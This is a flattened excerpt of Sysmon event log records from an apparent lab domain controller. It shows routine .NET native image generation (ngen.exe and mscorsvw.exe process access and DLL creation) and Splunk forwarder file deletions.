21:04:46.163{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000021053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x800000000000000021052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.990{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.928{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4859EA36B06AA0465117F73C595C6834,SHA256=D2F1E826763110198C2F863FAD39215BF5D4110BEE4694B76AE2827C7E0C9363,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000021050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.896{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.865{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.865{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.850{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f64-0\Microsoft.Windows.ServerManager.Ipam.Plugin.dll2021-06-23 21:04:47.850 10341000x800000000000000021046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.771{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.771{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.709{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3D6A3AD2A8DA25A840F7D4D490348E1,SHA256=30735BEE47EAF72C8FFE903ADA5C0D3494C654D97385345D19F4F0117290E404,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000021042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.663{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.631{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.631{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.600{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b64-0\Microsoft.Windows.ServerManager.HyperV.Plugin.dll2021-06-23 21:04:47.600 10341000x800000000000000021038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.303{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.271{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.271{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:47.131{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.084{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ba4-0\Microsoft.Windows.ServerManager.FaxServer.Plugin.dll2021-06-23 21:04:47.084 23542300x800000000000000021064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:48.990{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36C88C10C92CFFF2DDC4A2E04FA8DC18,SHA256=E1D70EDE48BCC7339DAEE598CBF2396C76322C344E9B0E3EEE029E6FDECFF77A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.818{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4F32B58970903D3F6ED1F727047553,SHA256=E2089BE830293952CAF3C65E5E00E22858583D5F02B1360EECF78D84914B5461,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.725{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:48.693{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 